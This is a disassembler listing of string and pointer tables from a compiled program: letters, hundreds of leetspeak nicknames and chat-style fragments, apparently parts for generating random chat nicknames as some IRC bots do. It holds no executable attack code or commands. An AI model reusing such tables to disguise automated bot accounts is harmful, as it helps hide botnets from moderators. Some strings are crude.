dd offset aE_0 ; "e"
dd offset word_43EF70
dd offset dword_450060
dd offset aY ; "y"
dd offset dword_45005C
dd offset dword_450058
dd offset dword_450054
dd offset dword_43DAAC
dd offset aS_2 ; "s"
dd offset off_45004E+2
dd offset aF_3 ; "f"
dd offset aG_3 ; "g"
dd offset asc_450044 ; "h"
dd offset aJ_3 ; "j"
dd offset aK_4 ; "k"
dd offset asc_450038 ; "l"
dd offset aZ_5 ; "z"
dd offset dword_43AB88
dd offset word_43EF74
dd offset aV_3 ; "v"
dd offset aB_2 ; "b"
dd offset aN_5 ; "n"
dd offset aM_7 ; "m"
dd offset aQ_3 ; "Q"
dd offset aW_2 ; "W"
dd offset aE_4 ; "E"
dd offset aR_2 ; "R"
dd offset aT_3 ; "T"
dd offset aY_3 ; "Y"
dd offset aU_3 ; "U"
dd offset aI_4 ; "I"
dd offset aO_3 ; "O"
dd offset aP ; "P"
dd offset aA_1 ; "A"
dd offset aS_10 ; "S"
dd offset aD_3 ; "D"
dd offset aF_2 ; "F"
dd offset aG_2 ; "G"
dd offset asc_44FFE8 ; "H"
dd offset aJ_2 ; "J"
dd offset aK_3 ; "K"
dd offset asc_44FFDC ; "L"
dd offset aZ_4 ; "Z"
dd offset asc_43D940 ; "X"
dd offset aC_4 ; "C"
dd offset aV_2 ; "V"
dd offset aB_1 ; "B"
dd offset aN_4 ; "N"
dd offset aM ; "M"
dd offset aSm4rt3 ; "SM4RT3"
dd offset aFar0oq ; "far0oq"
dd offset aMax1xguy ; "max1xguy"
dd offset aB0bm4rl3y ; "B0BM4RL3Y"
dd offset aEmilya ; "emilya"
dd offset aEmilyia ; "Emilyia"
dd offset aKr1zha ; "KR1ZHA"
dd offset aC4r1nna ; "C4r1nna"
dd offset aSw1n ; "sw1n"
dd offset aM4le ; "m4le"
dd offset aKok00 ; "kok00"
dd offset aFl3xxxt3r ; "fl3xxxt3r"
dd offset aK3nnn ; "k3nnn"
dd offset aXc4libr3 ; "xc4libr3"
dd offset aXtcXcal ; "xTc-xCaL"
dd offset aPwntuuuu ; "pwntuuuu"
dd offset aShezzza ; "Shezzza"
dd offset aTalika ; "Talika"
dd offset aM4rcy ; "m4rcy"
dd offset aSeiny ; "seiny"
dd offset aSe1nf3ld ; "se1nf3ld"
dd offset aCmecme ; "cmecme"
dd offset aHev4l ; "hev4l"
dd offset aBunty007 ; "bunty007"
dd offset aJann0 ; "jann0"
dd offset aR1mpy ; "r1mpy"
dd offset aH4xdd ; "h4xdd-"
dd offset aNastsha ; "nastsha"
dd offset aLisau ; "Lisau"
dd offset aTr0ll3r ; "tr0ll3r"
dd offset aM4n4e ; "m4n4e"
dd offset aK3rm1t ; "k3rm1t"
dd offset aPur3g0ld ; "pur3g0ld"
dd offset aC0redumpdd ; "C0reDumpDd"
dd offset aIiimra ; "iiimra"
dd offset aGirlzx ; "GirLzx"
dd offset aCam3l ; "CAM3L-"
dd offset aReshma ; "reshma"
dd offset aK3ncing ; "K3ncing"
dd offset aR45h3r ; "R45H3R"
dd offset aC4nsuu ; "c4nsuu"
dd offset aKandent ; "kandent"
dd offset aErk4nerkali ; "erk4nerkali"
dd offset aHexa4a ; "hexa4a"
dd offset aBerkkkko ; "berkkkko"
dd offset aBenibi ; "BeNiBi"
dd offset aIrm4ll ; "irm4Ll"
dd offset aMizsund4y ; "mizsund4y"
dd offset aTolga38 ; "Tolga38"
dd offset aJer1cho ; "JER1CHO"
dd offset aM4ry ; "M4RY-"
dd offset aAk1n ; "AK1N"
dd offset aMel3kk ; "mel3kk"
dd offset aTrr3nd ; "trr3nd"
dd offset aMERV ; "M-E-R-V"
dd offset aTekir ; "tekir"
dd offset aVenedik34 ; "venedik34"
dd offset aSevmekmi ; "sevmekmi"
dd offset aSud3nur ; "SUD3NUR"
dd offset aR0t0r ; "r0t0r-"
dd offset aR0t0 ; "r0t0"
dd offset aSmokeySn ; "smokey-sn"
dd offset aSmok3yS ; "smok3y-s"
dd offset aR0t0r ; "r0t0r-"
dd offset aRyann ; "ryann"
dd offset aNils ; "Nils-"
dd offset aDog ; "dog-"
dd offset aD_ ; "d_"
dd offset a_d ; "_d"
dd offset aBl0ndu ; "Bl0ndu"
dd offset aAkw1dz ; "AKW1Dz"
dd offset aRot0r ; "rot0r"
dd offset aBlondu ; "Blondu-"
dd offset aXc4l ; "XC4L"
dd offset aXtczzz ; "xTczzz"
dd offset aDczz ; "dczz"
dd offset aAhm3txtc ; "Ahm3tXTC"
dd offset aArzu ; "ARZU"
dd offset aHaticem ; "haticem"
dd offset aErnesto ; "ERNESTO"
dd offset aAslii ; "aslii"
dd offset aPiram1t ; "PIRAM1T"
dd offset aSamy3li ; "samy3li"
dd offset aRetg ; "RETG-"
dd offset aBlackp34rl ; "blackp34rl"
dd offset aPelinci ; "pelinci"
dd offset aAhm3t ; "ahm3t"
dd offset aTurkyballs ; "turkyballs"
dd offset aAnk32m ; "ank32m"
dd offset aAck0111 ; "ACK0111"
dd offset aIzm1rm ; "Izm1rm"
dd offset aAlb1na ; "alb1na"
dd offset aAyla ; "AYLA-"
dd offset aAte3e ; "AtE3e"
dd offset aAnkh4h ; "ankh4h"
dd offset aDonju4nm ; "Donju4nm"
dd offset aBog4c3r ; "bog4c3r"
dd offset aAlpay3m ; "alpay3m"
dd offset aCongu ; "CoNGU"
dd offset aDzlim ; "DzliM"
dd offset aDevran ; "DeVran"
dd offset aArd4k ; "ard4k"
dd offset aKeyifli ; "keyifli"
dd offset aMuratm_ ; "muratm_"
dd offset aHak4n3 ; "hak4n3"
dd offset aIrz4l ; "IRZ4L"
dd offset aAmth4n ; "AMTH4N"
dd offset aEmr3e ; "Emr3e"
dd offset aElm4zyok ; "elm4zyok"
dd offset aEsm3rkiz ; "Esm3rkiz"
dd offset aKeb1kec ; "keb1kec"
dd offset aFl0rd ; "FL0RD"
dd offset aH0ly1 ; "h0ly1"
dd offset aMahinure ; "MAHINURE"
dd offset aEllesme ; "Ellesme"
dd offset aAkut1 ; "akut1"
dd offset aKashmira ; "Kashmira"
dd offset aS3vis ; "S3ViS"
dd offset aSugaboi ; "SUGABOi"
dd offset aUzgun36 ; "uzgun36"
dd offset aKumul ; "kumul"
dd offset aAd4lim ; "AD4LIM"
dd offset aUmut00 ; "umut00"
dd offset aAnk32 ; "ANK32"
dd offset aDjmace ; "DJMACE"
dd offset aAnkart ; "Ankart"
dd offset aF3n3r ; "F3N3R"
dd offset aH4yr4n ; "h4yr4n"
dd offset aAng3lg4l ; "ang3lg4l"
dd offset aK4pk ; "k4pk"
dd offset aAchill3s ; "Achill3s"
dd offset aT3gm3n ; "T3GM3N"
dd offset aKot4n ; "kot4n"
dd offset aSevdan ; "sevdan"
dd offset aErkaaaa ; "ERKAAAA"
dd offset aAlcatrazak ; "alcatraZAK"
dd offset aA44mmm ; "a44mmm"
dd offset aB1rs3n ; "b1rs3n"
dd offset aYab4nc ; "yab4nc"
dd offset aD3vre ; "d3vre"
dd offset aErk3nnn ; "erk3nnn"
dd offset aAnkm4a ; "ankM4a"
dd offset aAd3m28 ; "Ad3m28"
dd offset aMaxs1lla ; "maxs1lla"
dd offset aM41st ; "M41ST"
dd offset aAd33 ; "Ad33"
dd offset aFirt ; "firt"
dd offset aAta29111 ; "Ata29111"
dd offset aK00oray ; "K00ORAY"
dd offset aAkd3nnan ; "akd3nnan"
dd offset aLizmirlm ; "Lizmirlm"
dd offset aUlaru ; "ularu"
dd offset aNe__ ; "NE__"
dd offset aPassenger ; "passenger"
dd offset aTr0pikal ; "tr0pikal"
dd offset aC00l30m ; "c00l30m"
dd offset aC3m39 ; "c3m39"
dd offset aRerpjj ; "RERPJJ"
dd offset aTeoman ; "TEOMAN``"
dd offset aDallas ; "DALLAS"
dd offset aProm3theus ; "prom3theus"
dd offset aMaverick ; "MavericK"
dd offset aAdammo ; "ADAMMO"
dd offset aCumhur ; "cumhur"
dd offset aBiatch ; "biatch"
dd offset aW4nt3d ; "W4NT3D"
dd offset aBaby ; "baby"
dd offset aPizza ; "pizza"
dd offset aFat ; "fat"
dd offset aChild ; "child"
dd offset aMoon ; "moon"
dd offset aMan ; "man"
align 10h
off_44F6A0 dd offset aSh3x ; DATA XREF: sub_426761+4E�r
; sub_426761+F8�r
; "sh3x"
dd offset aLez ; "lez"
dd offset aZex ; "zex"
dd offset aTree ; "tree"
dd offset off_44F9D0
dd offset off_44F9CC
dd offset aTambe ; "|tambe|"
dd offset aWoh ; "|woh|"
dd offset aTot ; "-|tot|"
dd offset aSuck ; "|suck|"
dd offset aLuck ; "|luck|"
dd offset aHub ; "{hub}"
dd offset aSex ; "{sex}"
dd offset aGens ; "{gens|"
dd offset aLuf ; "|luf|"
dd offset aWikd ; "|wikd"
dd offset aSi ; "si}}"
dd offset aQ809 ; "Q809"
dd offset aDd8A ; "|dd8|a"
dd offset aB_2 ; "b"
dd offset word_43EF74
dd offset off_45004E+2
dd offset aE_0 ; "e"
dd offset aF_3 ; "f"
dd offset aG_3 ; "g"
dd offset asc_450044 ; "h"
dd offset dword_450058
dd offset a__2 ; "_"
dd offset aJ_3 ; "j"
dd offset aK_4 ; "k"
dd offset asc_450038 ; "l"
dd offset aM_7 ; "m"
dd offset aN_5 ; "n"
dd offset aO_2 ; "o"
dd offset dword_450054
dd offset aQ ; "q"
dd offset aRs ; "rs"
dd offset dword_450060
dd offset dword_45005C
dd offset aV_3 ; "v"
dd offset dword_450064
dd offset dword_43AB88
dd offset aY ; "y"
dd offset aZ_5 ; "z"
dd offset aHay ; "hay"
dd offset aRg ; "rg"
dd offset aTy ; "ty"
dd offset aGf ; "gf"
dd offset aRt ; "rt"
dd offset aDf ; "df"
dd offset aUi ; "ui"
dd offset aLuvy ; "luvy"
dd offset aTry ; "try"
dd offset aTrick ; "trick"
dd offset off_44F924
dd offset aZ_5 ; "z"
dd offset aG_3 ; "g"
dd offset aS_2 ; "s"
dd offset aQ ; "q"
dd offset aAfk ; "afk"
dd offset aAway ; "away"
dd offset dword_44F910
dd offset dword_44F908
dd offset off_44F904
dd offset aBbl ; "|bbl"
dd offset aW00i3s ; "w00i3s-"
dd offset aJunk ; "junk"
dd offset off_44F8E8
dd offset aF_2 ; "F"
dd offset aM ; "M"
dd offset aLuvu ; "LUVU"
dd offset off_44F8DC
dd offset aAa ; "^AA^"
dd offset aB_2 ; "b"
dd offset byte_454A54
dd offset aSl33pin ; "Sl33piN"
dd offset byte_454A54
dd offset byte_454A54
dd offset aFook ; "|Fook|"
dd offset aFree ; "Free"
dd offset byte_454A54
dd offset byte_454A54
dd offset asc_43D940 ; "X"
dd offset byte_454A54
dd offset off_44F8B8
dd offset aGirl ; "GIRL"
dd offset aGurl ; "gurl"
dd offset aShit ; "shit"
dd offset off_44F89C
dd offset aYeah ; "yeah"
dd offset aMuha ; "muha"
dd offset aMof0z ; "mof0z"
dd offset aMofoz ; "mofoz"
dd offset aTotz ; "totz"
dd offset aLol0lzz ; "lol0lzz"
dd offset aLololz ; "lololz"
dd offset dword_44F860
dd offset dword_44F858
dd offset dword_44F850
dd offset dword_44F848
dd offset dword_44F844
dd offset dword_44F840
dd offset dword_44F83C
dword_44F83C dd 7536h dword_44F840 dd 7538h dword_44F844 dd 347Ch dword_44F848 dd 756F7934h, 7Dhdword_44F850 dd 7C737534h, 0 dword_44F858 dd 65657266h, 7Chdword_44F860 dd 7C617Ch aLololz db 'lololz',0 ; DATA XREF: .text:0044F81C�o
align 4
aLol0lzz db 'lol0lzz',0 ; DATA XREF: .text:0044F818�o
aTotz db 'totz',0 ; DATA XREF: .text:0044F814�o
align 4
aMofoz db 'mofoz',0 ; DATA XREF: .text:0044F810�o
align 4
aMof0z db 'mof0z',0 ; DATA XREF: .text:0044F80C�o
align 4
aMuha db 'muha',0 ; DATA XREF: .text:0044F808�o
align 4
aYeah db 'yeah',0 ; DATA XREF: .text:0044F804�o
align 4
off_44F89C dd offset byte_616861 ; DATA XREF: .text:0044F800�o
aShit db 'shit',0 ; DATA XREF: .text:0044F7FC�o
align 4
aGurl db 'gurl',0 ; DATA XREF: .text:0044F7F8�o
align 10h
aGirl db 'GIRL',0 ; DATA XREF: .text:0044F7F4�o
align 4
off_44F8B8 dd offset word_594F42 ; DATA XREF: .text:0044F7F0�o
aFree db 'Free',0 ; DATA XREF: .text:0044F7DC�o
align 4
aFook db '|Fook|',0 ; DATA XREF: .text:0044F7D8�o
align 4
aSl33pin db 'Sl33piN',0 ; DATA XREF: .text:0044F7CC�o
aAa db '^AA^',0 ; DATA XREF: .text:0044F7C0�o
align 4
off_44F8DC dd offset byte_646153 ; DATA XREF: .text:0044F7BC�o
aLuvu db 'LUVU',0 ; DATA XREF: .text:0044F7B8�o
align 4
off_44F8E8 dd offset byte_5F7C5F ; DATA XREF: .text:0044F7AC�o
aJunk db 'junk',0 ; DATA XREF: .text:0044F7A8�o
align 4
aW00i3s db 'w00i3s-',0 ; DATA XREF: .text:0044F7A4�o
aBbl db '|bbl',0 ; DATA XREF: .text:0044F7A0�o
align 4
off_44F904 dd offset loc_425240+2 ; DATA XREF: .text:0044F79C�o
dword_44F908 dd 6B66617Ch, 0 dword_44F910 dd 6177617Ch, 79haAway db 'away',0 ; DATA XREF: .text:0044F790�o
align 10h
aAfk db 'afk',0 ; DATA XREF: .text:0044F78C�o
off_44F924 dd offset byte_63636D ; DATA XREF: .text:0044F778�o
aTrick db 'trick',0 ; DATA XREF: .text:0044F774�o
align 10h
aTry db 'try',0 ; DATA XREF: .text:0044F770�o
aLuvy db 'luvy',0 ; DATA XREF: .text:0044F76C�o
align 4
aUi db 'ui',0 ; DATA XREF: .text:0044F768�o
align 10h
aDf db 'df',0 ; DATA XREF: .text:0044F764�o
align 4
aRt db 'rt',0 ; DATA XREF: .text:0044F760�o
align 4
aGf db 'gf',0 ; DATA XREF: .text:0044F75C�o
align 4
aTy db 'ty',0 ; DATA XREF: .text:0044F758�o
align 10h
aRg db 'rg',0 ; DATA XREF: .text:0044F754�o
align 4
aHay db 'hay',0 ; DATA XREF: .text:0044F750�o
aRs db 'rs',0 ; DATA XREF: .text:0044F730�o
align 4
aO_2: ; DATA XREF: .text:0044F724�o
unicode 0, <o>,0
a__2: ; DATA XREF: .text:0044F70C�o
unicode 0, <_>,0
aDd8A db '|dd8|a',0 ; DATA XREF: .text:0044F6E8�o
align 4
aQ809 db 'Q809',0 ; DATA XREF: .text:0044F6E4�o
align 4
aSi db 'si}}',0 ; DATA XREF: .text:0044F6E0�o
align 4
aWikd db '|wikd',0 ; DATA XREF: .text:0044F6DC�o
align 4
aLuf db '|luf|',0 ; DATA XREF: .text:0044F6D8�o
align 4
aGens db '{gens|',0 ; DATA XREF: .text:0044F6D4�o
align 4
aSex db '{sex}',0 ; DATA XREF: .text:0044F6D0�o
align 4
aHub db '{hub}',0 ; DATA XREF: .text:0044F6CC�o
align 4
aLuck db '|luck|',0 ; DATA XREF: .text:0044F6C8�o
align 4
aSuck db '|suck|',0 ; DATA XREF: .text:0044F6C4�o
align 4
aTot db '-|tot|',0 ; DATA XREF: .text:0044F6C0�o
align 4
aWoh db '|woh|',0 ; DATA XREF: .text:0044F6BC�o
align 4
aTambe db '|tambe|',0 ; DATA XREF: .text:0044F6B8�o
off_44F9CC dd offset dword_67616C ; DATA XREF: .text:0044F6B4�o
off_44F9D0 dd offset word_646162 ; DATA XREF: .text:0044F6B0�o
aTree db 'tree',0 ; DATA XREF: .text:0044F6AC�o
align 4
aZex db 'zex',0 ; DATA XREF: .text:0044F6A8�o
aLez db 'lez',0 ; DATA XREF: .text:0044F6A4�o
aSh3x db 'sh3x',0 ; DATA XREF: .text:off_44F6A0�o
align 4
aMan db 'man',0 ; DATA XREF: .text:0044F698�o
aMoon db 'moon',0 ; DATA XREF: .text:0044F694�o
align 4
aChild db 'child',0 ; DATA XREF: .text:0044F690�o
align 10h
aFat db 'fat',0 ; DATA XREF: .text:0044F68C�o
aPizza db 'pizza',0 ; DATA XREF: .text:0044F688�o
align 4
aBaby db 'baby',0 ; DATA XREF: .text:0044F684�o
align 4
aW4nt3d db 'W4NT3D',0 ; DATA XREF: .text:0044F680�o
align 4
aBiatch db 'biatch',0 ; DATA XREF: .text:0044F67C�o
align 4
aCumhur db 'cumhur',0 ; DATA XREF: .text:0044F678�o
align 4
aAdammo db 'ADAMMO',0 ; DATA XREF: .text:0044F674�o
align 4
aMaverick db 'MavericK',0 ; DATA XREF: .text:0044F670�o
align 10h
aProm3theus db 'prom3theus',0 ; DATA XREF: .text:0044F66C�o
align 4
aDallas db 'DALLAS',0 ; DATA XREF: .text:0044F668�o
align 4
aTeoman db 'TEOMAN``',0 ; DATA XREF: .text:0044F664�o
align 10h
aRerpjj db 'RERPJJ',0 ; DATA XREF: .text:0044F660�o
align 4
aC3m39 db 'c3m39',0 ; DATA XREF: .text:0044F65C�o
align 10h
aC00l30m db 'c00l30m',0 ; DATA XREF: .text:0044F658�o
aTr0pikal db 'tr0pikal',0 ; DATA XREF: .text:0044F654�o
align 4
aPassenger db 'passenger',0 ; DATA XREF: .text:0044F650�o
align 10h
aNe__ db 'NE__',0 ; DATA XREF: .text:0044F64C�o
align 4
aUlaru db 'ularu',0 ; DATA XREF: .text:0044F648�o
align 10h
aLizmirlm db 'Lizmirlm',0 ; DATA XREF: .text:0044F644�o
align 4
aAkd3nnan db 'akd3nnan',0 ; DATA XREF: .text:0044F640�o
align 4
aK00oray db 'K00ORAY',0 ; DATA XREF: .text:0044F63C�o
aAta29111 db 'Ata29111',0 ; DATA XREF: .text:0044F638�o
align 4
aFirt db 'firt',0 ; DATA XREF: .text:0044F634�o
align 4
aAd33 db 'Ad33',0 ; DATA XREF: .text:0044F630�o
align 4
aM41st db 'M41ST',0 ; DATA XREF: .text:0044F62C�o
align 4
aMaxs1lla db 'maxs1lla',0 ; DATA XREF: .text:0044F628�o
align 10h
aAd3m28 db 'Ad3m28',0 ; DATA XREF: .text:0044F624�o
align 4
aAnkm4a db 'ankM4a',0 ; DATA XREF: .text:0044F620�o
align 10h
aErk3nnn db 'erk3nnn',0 ; DATA XREF: .text:0044F61C�o
aD3vre db 'd3vre',0 ; DATA XREF: .text:0044F618�o
align 10h
aYab4nc db 'yab4nc',0 ; DATA XREF: .text:0044F614�o
align 4
aB1rs3n db 'b1rs3n',0 ; DATA XREF: .text:0044F610�o
align 10h
aA44mmm db 'a44mmm',0 ; DATA XREF: .text:0044F60C�o
align 4
aAlcatrazak db 'alcatraZAK',0 ; DATA XREF: .text:0044F608�o
align 4
aErkaaaa db 'ERKAAAA',0 ; DATA XREF: .text:0044F604�o
aSevdan db 'sevdan',0 ; DATA XREF: .text:0044F600�o
align 4
aKot4n db 'kot4n',0 ; DATA XREF: .text:0044F5FC�o
align 4
aT3gm3n db 'T3GM3N',0 ; DATA XREF: .text:0044F5F8�o
align 4
aAchill3s db 'Achill3s',0 ; DATA XREF: .text:0044F5F4�o
align 10h
aK4pk db 'k4pk',0 ; DATA XREF: .text:0044F5F0�o
align 4
aAng3lg4l db 'ang3lg4l',0 ; DATA XREF: .text:0044F5EC�o
align 4
aH4yr4n db 'h4yr4n',0 ; DATA XREF: .text:0044F5E8�o
align 4
aF3n3r db 'F3N3R',0 ; DATA XREF: .text:0044F5E4�o
align 4
aAnkart db 'Ankart',0 ; DATA XREF: .text:0044F5E0�o
align 4
aDjmace db 'DJMACE',0 ; DATA XREF: .text:0044F5DC�o
align 4
aAnk32 db 'ANK32',0 ; DATA XREF: .text:0044F5D8�o
align 4
aUmut00 db 'umut00',0 ; DATA XREF: .text:0044F5D4�o
align 4
aAd4lim db 'AD4LIM',0 ; DATA XREF: .text:0044F5D0�o
align 4
aKumul db 'kumul',0 ; DATA XREF: .text:0044F5CC�o
align 4
aUzgun36 db 'uzgun36',0 ; DATA XREF: .text:0044F5C8�o
aSugaboi db 'SUGABOi',0 ; DATA XREF: .text:0044F5C4�o
aS3vis db 'S3ViS',0 ; DATA XREF: .text:0044F5C0�o
align 4
aKashmira db 'Kashmira',0 ; DATA XREF: .text:0044F5BC�o
align 4
aAkut1 db 'akut1',0 ; DATA XREF: .text:0044F5B8�o
align 10h
aEllesme db 'Ellesme',0 ; DATA XREF: .text:0044F5B4�o
aMahinure db 'MAHINURE',0 ; DATA XREF: .text:0044F5B0�o
align 4
aH0ly1 db 'h0ly1',0 ; DATA XREF: .text:0044F5AC�o
align 4
aFl0rd db 'FL0RD',0 ; DATA XREF: .text:0044F5A8�o
align 4
aKeb1kec db 'keb1kec',0 ; DATA XREF: .text:0044F5A4�o
aEsm3rkiz db 'Esm3rkiz',0 ; DATA XREF: .text:0044F5A0�o
align 4
aElm4zyok db 'elm4zyok',0 ; DATA XREF: .text:0044F59C�o
align 4
aEmr3e db 'Emr3e',0 ; DATA XREF: .text:0044F598�o
align 4
aAmth4n db 'AMTH4N',0 ; DATA XREF: .text:0044F594�o
align 4
aIrz4l db 'IRZ4L',0 ; DATA XREF: .text:0044F590�o
align 4
aHak4n3 db 'hak4n3',0 ; DATA XREF: .text:0044F58C�o
align 4
aMuratm_ db 'muratm_',0 ; DATA XREF: .text:0044F588�o
aKeyifli db 'keyifli',0 ; DATA XREF: .text:0044F584�o
aArd4k db 'ard4k',0 ; DATA XREF: .text:0044F580�o
align 4
aDevran db 'DeVran',0 ; DATA XREF: .text:0044F57C�o
align 4
aDzlim db 'DzliM',0 ; DATA XREF: .text:0044F578�o
align 4
aCongu db 'CoNGU',0 ; DATA XREF: .text:0044F574�o
align 4
aAlpay3m db 'alpay3m',0 ; DATA XREF: .text:0044F570�o
aBog4c3r db 'bog4c3r',0 ; DATA XREF: .text:0044F56C�o
aDonju4nm db 'Donju4nm',0 ; DATA XREF: .text:0044F568�o
align 10h
aAnkh4h db 'ankh4h',0 ; DATA XREF: .text:0044F564�o
align 4
aAte3e db 'AtE3e',0 ; DATA XREF: .text:0044F560�o
align 10h
aAyla db 'AYLA-',0 ; DATA XREF: .text:0044F55C�o
align 4
aAlb1na db 'alb1na',0 ; DATA XREF: .text:0044F558�o
align 10h
aIzm1rm db 'Izm1rm',0 ; DATA XREF: .text:0044F554�o
align 4
aAck0111 db 'ACK0111',0 ; DATA XREF: .text:0044F550�o
aAnk32m db 'ank32m',0 ; DATA XREF: .text:0044F54C�o
align 4
aTurkyballs db 'turkyballs',0 ; DATA XREF: .text:0044F548�o
align 4
aAhm3t db 'ahm3t',0 ; DATA XREF: .text:0044F544�o
align 4
aPelinci db 'pelinci',0 ; DATA XREF: .text:0044F540�o
aBlackp34rl db 'blackp34rl',0 ; DATA XREF: .text:0044F53C�o
align 10h
aRetg db 'RETG-',0 ; DATA XREF: .text:0044F538�o
align 4
aSamy3li db 'samy3li',0 ; DATA XREF: .text:0044F534�o
aPiram1t db 'PIRAM1T',0 ; DATA XREF: .text:0044F530�o
aAslii db 'aslii',0 ; DATA XREF: .text:0044F52C�o
align 10h
aErnesto db 'ERNESTO',0 ; DATA XREF: .text:0044F528�o
aHaticem db 'haticem',0 ; DATA XREF: .text:0044F524�o
aArzu db 'ARZU',0 ; DATA XREF: .text:0044F520�o
align 4
aAhm3txtc db 'Ahm3tXTC',0 ; DATA XREF: .text:0044F51C�o
align 4
aDczz db 'dczz',0 ; DATA XREF: .text:0044F518�o
align 4
aXtczzz db 'xTczzz',0 ; DATA XREF: .text:0044F514�o
align 4
aXc4l db 'XC4L',0 ; DATA XREF: .text:0044F510�o
align 4
aBlondu db 'Blondu-',0 ; DATA XREF: .text:0044F50C�o
aRot0r db 'rot0r',0 ; DATA XREF: .text:0044F508�o
align 4
aAkw1dz db 'AKW1Dz',0 ; DATA XREF: .text:0044F504�o
align 4
aBl0ndu db 'Bl0ndu',0 ; DATA XREF: .text:0044F500�o
align 4
a_d db '_d',0 ; DATA XREF: .text:0044F4FC�o
align 10h
aD_ db 'd_',0 ; DATA XREF: .text:0044F4F8�o
align 4
aDog db 'dog-',0 ; DATA XREF: .text:0044F4F4�o
align 4
aNils db 'Nils-',0 ; DATA XREF: .text:0044F4F0�o
align 4
aRyann db 'ryann',0 ; DATA XREF: .text:0044F4EC�o
align 4
aSmok3yS db 'smok3y-s',0 ; DATA XREF: .text:0044F4E4�o
align 4
aSmokeySn db 'smokey-sn',0 ; DATA XREF: .text:0044F4E0�o
align 4
aR0t0 db 'r0t0',0 ; DATA XREF: .text:0044F4DC�o
align 4
aR0t0r db 'r0t0r-',0 ; DATA XREF: .text:0044F4D8�o
; .text:0044F4E8�o
align 4
aSud3nur db 'SUD3NUR',0 ; DATA XREF: .text:0044F4D4�o
aSevmekmi db 'sevmekmi',0 ; DATA XREF: .text:0044F4D0�o
align 4
aVenedik34 db 'venedik34',0 ; DATA XREF: .text:0044F4CC�o
align 4
aTekir db 'tekir',0 ; DATA XREF: .text:0044F4C8�o
align 4
aMERV db 'M-E-R-V',0 ; DATA XREF: .text:0044F4C4�o
aTrr3nd db 'trr3nd',0 ; DATA XREF: .text:0044F4C0�o
align 4
aMel3kk db 'mel3kk',0 ; DATA XREF: .text:0044F4BC�o
align 4
aAk1n db 'AK1N',0 ; DATA XREF: .text:0044F4B8�o
align 4
aM4ry db 'M4RY-',0 ; DATA XREF: .text:0044F4B4�o
align 4
aJer1cho db 'JER1CHO',0 ; DATA XREF: .text:0044F4B0�o
aTolga38 db 'Tolga38',0 ; DATA XREF: .text:0044F4AC�o
aMizsund4y db 'mizsund4y',0 ; DATA XREF: .text:0044F4A8�o
align 10h
aIrm4ll db 'irm4Ll',0 ; DATA XREF: .text:0044F4A4�o
align 4
aBenibi db 'BeNiBi',0 ; DATA XREF: .text:0044F4A0�o
align 10h
aBerkkkko db 'berkkkko',0 ; DATA XREF: .text:0044F49C�o
align 4
aHexa4a db 'hexa4a',0 ; DATA XREF: .text:0044F498�o
align 4
aErk4nerkali db 'erk4nerkali',0 ; DATA XREF: .text:0044F494�o
aKandent db 'kandent',0 ; DATA XREF: .text:0044F490�o
aC4nsuu db 'c4nsuu',0 ; DATA XREF: .text:0044F48C�o
align 10h
aR45h3r db 'R45H3R',0 ; DATA XREF: .text:0044F488�o
align 4
aK3ncing db 'K3ncing',0 ; DATA XREF: .text:0044F484�o
aReshma db 'reshma',0 ; DATA XREF: .text:0044F480�o
align 4
aCam3l db 'CAM3L-',0 ; DATA XREF: .text:0044F47C�o
align 10h
aGirlzx db 'GirLzx',0 ; DATA XREF: .text:0044F478�o
align 4
aIiimra db 'iiimra',0 ; DATA XREF: .text:0044F474�o
align 10h
aC0redumpdd db 'C0reDumpDd',0 ; DATA XREF: .text:0044F470�o
align 4
aPur3g0ld db 'pur3g0ld',0 ; DATA XREF: .text:0044F46C�o
align 4
aK3rm1t db 'k3rm1t',0 ; DATA XREF: .text:0044F468�o
align 10h
aM4n4e db 'm4n4e',0 ; DATA XREF: .text:0044F464�o
align 4
aTr0ll3r db 'tr0ll3r',0 ; DATA XREF: .text:0044F460�o
aLisau db 'Lisau',0 ; DATA XREF: .text:0044F45C�o
align 4
aNastsha db 'nastsha',0 ; DATA XREF: .text:0044F458�o
aH4xdd db 'h4xdd-',0 ; DATA XREF: .text:0044F454�o
align 4
aR1mpy db 'r1mpy',0 ; DATA XREF: .text:0044F450�o
align 10h
aJann0 db 'jann0',0 ; DATA XREF: .text:0044F44C�o
align 4
aBunty007 db 'bunty007',0 ; DATA XREF: .text:0044F448�o
align 4
aHev4l db 'hev4l',0 ; DATA XREF: .text:0044F444�o
align 4
aCmecme db 'cmecme',0 ; DATA XREF: .text:0044F440�o
align 4
aSe1nf3ld db 'se1nf3ld',0 ; DATA XREF: .text:0044F43C�o
align 10h
aSeiny db 'seiny',0 ; DATA XREF: .text:0044F438�o
align 4
aM4rcy db 'm4rcy',0 ; DATA XREF: .text:0044F434�o
align 10h
aTalika db 'Talika',0 ; DATA XREF: .text:0044F430�o
align 4
aShezzza db 'Shezzza',0 ; DATA XREF: .text:0044F42C�o
aPwntuuuu db 'pwntuuuu',0 ; DATA XREF: .text:0044F428�o
align 4
aXtcXcal db 'xTc-xCaL',0 ; DATA XREF: .text:0044F424�o
align 4
aXc4libr3 db 'xc4libr3',0 ; DATA XREF: .text:0044F420�o
align 4
aK3nnn db 'k3nnn',0 ; DATA XREF: .text:0044F41C�o
align 4
aFl3xxxt3r db 'fl3xxxt3r',0 ; DATA XREF: .text:0044F418�o
align 4
aKok00 db 'kok00',0 ; DATA XREF: .text:0044F414�o
align 10h
aM4le db 'm4le',0 ; DATA XREF: .text:0044F410�o
align 4
aSw1n db 'sw1n',0 ; DATA XREF: .text:0044F40C�o
align 10h
aC4r1nna db 'C4r1nna',0 ; DATA XREF: .text:0044F408�o
aKr1zha db 'KR1ZHA',0 ; DATA XREF: .text:0044F404�o
align 10h
aEmilyia db 'Emilyia',0 ; DATA XREF: .text:0044F400�o
aEmilya db 'emilya',0 ; DATA XREF: .text:0044F3FC�o
align 10h
aB0bm4rl3y db 'B0BM4RL3Y',0 ; DATA XREF: .text:0044F3F8�o
align 4
aMax1xguy db 'max1xguy',0 ; DATA XREF: .text:0044F3F4�o
align 4
aFar0oq db 'far0oq',0 ; DATA XREF: .text:0044F3F0�o
align 10h
aSm4rt3 db 'SM4RT3',0 ; DATA XREF: .text:0044F3EC�o
align 4
aN_4: ; DATA XREF: .text:0044F3E4�o
unicode 0, <N>,0
aB_1: ; DATA XREF: .text:0044F3E0�o
unicode 0, <B>,0
aV_2: ; DATA XREF: .text:0044F3DC�o
unicode 0, <V>,0
aC_4: ; DATA XREF: .text:0044F3D8�o
unicode 0, <C>,0
aZ_4: ; DATA XREF: .text:0044F3D0�o
unicode 0, <Z>,0
asc_44FFDC: ; DATA XREF: .text:0044F3CC�o
unicode 0, <L>,0
aK_3: ; DATA XREF: .text:0044F3C8�o
